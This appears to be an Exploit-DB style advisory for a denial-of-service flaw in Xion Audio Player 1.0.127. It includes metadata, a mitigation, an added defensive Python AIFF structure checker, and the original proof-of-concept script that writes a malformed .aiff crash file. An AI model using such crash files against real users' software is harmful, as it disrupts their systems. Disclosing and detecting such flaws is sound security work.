Vendor: Xion Audio Player
By: condis
CVSS: 7.5 (HIGH)
Type: Denial of Service
CWE: 399
Product Name: Xion Audio Player
Affected Version From: 1.0.127
Affected Version To: 1.0.127
Patch Exists: YES
Related CWE: N/A
CPE: a:xion_audio_player:xion_audio_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 Professional PL
2009

Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability

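Xion Audio Player 1.0.127 is vulnerable to a denial of service when a malicious .aiff file is opened. The file consists of a FORM header, the AIFF form type, the COMM chunk ID, and a single 'A' character. When the file is opened, the program crashes with an access violation while writing to 00000020; the register dump in the proof of concept below shows the faulting instruction inside the BASS module (MOV DWORD PTR DS:[EAX+20],1 with EAX = 00000000).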

Mitigation:

Update to the latest version of Xion Audio Player.
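
A structural check for the malformed file described above, as an added example that is not part of the original advisory or of Xion's code: it walks the IFF chunk layout and reports a FORM size larger than the file, a truncated chunk header, or a missing COMM chunk. The function names and the valid sample are constructed for illustration; the malformed sample uses the bytes shown on this page.

```python
import struct

# Bytes of the malformed file described on this page (17 bytes in total).
MALFORMED_SAMPLE = b"FORM\x00\x00\x37\xA4AIFFCOMM" + b"A"

def build_valid_sample():
    """Constructed minimal AIFF: an 18-byte COMM chunk and an empty SSND chunk."""
    rate = bytes.fromhex("400EAC44000000000000")  # 44100 Hz as 80-bit extended
    comm = b"COMM" + struct.pack(">IhIh", 18, 1, 0, 16) + rate
    ssnd = b"SSND" + struct.pack(">III", 8, 0, 0)
    body = b"AIFF" + comm + ssnd
    return b"FORM" + struct.pack(">I", len(body)) + body

def check_aiff(data):
    """Return a list of structural problems found in an AIFF/AIFC byte string."""
    if len(data) < 12 or data[:4] != b"FORM":
        return ["missing 12-byte FORM header"]
    problems = []
    form_size = struct.unpack(">I", data[4:8])[0]
    if form_size + 8 > len(data):
        problems.append("FORM size %d exceeds file length %d" % (form_size, len(data)))
    if data[8:12] not in (b"AIFF", b"AIFC"):
        problems.append("form type is not AIFF/AIFC")
    end = min(len(data), form_size + 8)  # never read past the real file
    pos, seen = 12, set()
    while pos < end:
        if end - pos < 8:  # a chunk needs a 4-byte ID and a 4-byte size
            problems.append("truncated chunk header at offset %d" % pos)
            break
        ckid = data[pos:pos + 4]
        size = struct.unpack(">I", data[pos + 4:pos + 8])[0]
        if pos + 8 + size > end:
            problems.append("chunk %r at offset %d overruns the file" % (ckid, pos))
            break
        if ckid == b"COMM" and size < 18:
            problems.append("COMM chunk shorter than 18 bytes")
        seen.add(ckid)
        pos += 8 + size + (size & 1)  # chunk bodies are padded to even length
    if b"COMM" not in seen:
        problems.append("no complete COMM chunk")
    return problems

if __name__ == "__main__":
    for name, blob in (("valid", build_valid_sample()), ("malformed", MALFORMED_SAMPLE)):
        print(name, check_aiff(blob) or "ok")
```
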

Exploit-DB raw data:

#!/usr/bin/python

# -------------------------------------------------------------------
# Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability
# found by condis
#
# Download  : http://xion.r2.com.au/index.php?page=download
# Tested on : Windows XP SP3 Professional PL
#
# Registers : 
#
# EAX 00000000
# ECX 02D0B488
# EDX 7C90E4F4 ntdll.KiFastSystemCallRet
# EBX 02D0B4F8
# ESP 02D0B4F8
# EBP 02D0CA60
# ESI 003D8D80
# EDI 00001A00
# EIP 11013C18 BASS.11013C18
#
# 11013C18   C740 20 01000000 MOV DWORD PTR DS:[EAX+20],1 <--- crash
#
# "Access Violation while writing to 00000020"
#
# I've also found this kind of bug while playing around with .flac 
# files so I think that handling all of the supported formats must be 
# really messed up :<
# --------------------------------------------------------------------

evil  = b"FORM\x00\x00\x37\xA4AIFFCOMM"
evil += b"A" # <--- crash (rest of the file doesn't matter)

# Binary mode keeps the header bytes unchanged on disk
with open('xion-crash.aiff', 'wb') as aiff:
    aiff.write(evil)

print("Malicious .aiff file has been created. Enjoy")